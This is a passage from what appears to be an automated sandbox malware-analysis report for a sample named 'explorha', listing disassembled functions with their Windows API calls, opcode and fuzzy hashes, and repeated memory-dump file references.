                                                                                                      • Opcode Fuzzy Hash: 56897797c1fbbae334c4d1c5c2d4d70c11eb701fc4a1ee426f6ade139e9fe91f
                                                                                                      • Instruction Fuzzy Hash: 7CD0C931BE8B28B6F13062641C07F452A15B709F52F344002B71CBF2D40AC474008B9D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008983F9 Relevance: 3.1, APIs: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 32c998c739a01c78574ad87f075159b21fd84cc1c58a0e0b6e8500516d3523e9
                                                                                                      • Instruction ID: bb9c29d096a7390bdf72187360b1829edddd40dff1e8d727a993d0483d62f1df
                                                                                                      • Opcode Fuzzy Hash: 32c998c739a01c78574ad87f075159b21fd84cc1c58a0e0b6e8500516d3523e9
                                                                                                      • Instruction Fuzzy Hash: 6421C47190150AFAEF11BBA88C42B9E3769FF43338F184250F924AB1C1DE706E0596A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A430 Relevance: 3.0, APIs: 2, Instructions: 19sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 72e078d3d8ed42656cb2fe91cdb362345b1fd5630db6fb0f7a569ae31763605b
                                                                                                      • Instruction ID: 627bf44b438657d127e0c52113cc6c0b6435896699ef7885f8cc737a2eeed772
                                                                                                      • Opcode Fuzzy Hash: 72e078d3d8ed42656cb2fe91cdb362345b1fd5630db6fb0f7a569ae31763605b
                                                                                                      • Instruction Fuzzy Hash: C3D05E202D9600EAF604739C5C8DF392168E795705F251829A708894C189A071844A22
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00867E50 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00867FF4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721193555-0
                                                                                                      • Opcode ID: 9ee52104cf3fdcb9f3a298a951feffd49ca20fcf929181d0b4099a1c6f7bbe54
                                                                                                      • Instruction ID: c75afe750ad3125593429053e0017106407a5666f6b4e6464280ef690d681fcf
                                                                                                      • Opcode Fuzzy Hash: 9ee52104cf3fdcb9f3a298a951feffd49ca20fcf929181d0b4099a1c6f7bbe54
                                                                                                      • Instruction Fuzzy Hash: 6B512471904608DBEB24EB68CD45BDEB774FB45314F5042A8E818E72C2EF359AC48B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008986D1 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00898608,?,?,00000000,00000000), ref: 00898713
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Time$LocalSpecificSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2574697306-0
                                                                                                      • Opcode ID: 2f27d293e4b4710fcbb5d92517f8e3bf1f1f334001199940f7c02829105a377c
                                                                                                      • Instruction ID: 5241df99370c3eac3b9bb4a0be1f0955a9f4cba4638d7744e9ae7952e8d0d640
                                                                                                      • Opcode Fuzzy Hash: 2f27d293e4b4710fcbb5d92517f8e3bf1f1f334001199940f7c02829105a377c
                                                                                                      • Instruction Fuzzy Hash: 3911067290020DEADF01EEE5C884EDF77BDEB49310F245266E512E6180EA30EA448BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089C273 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
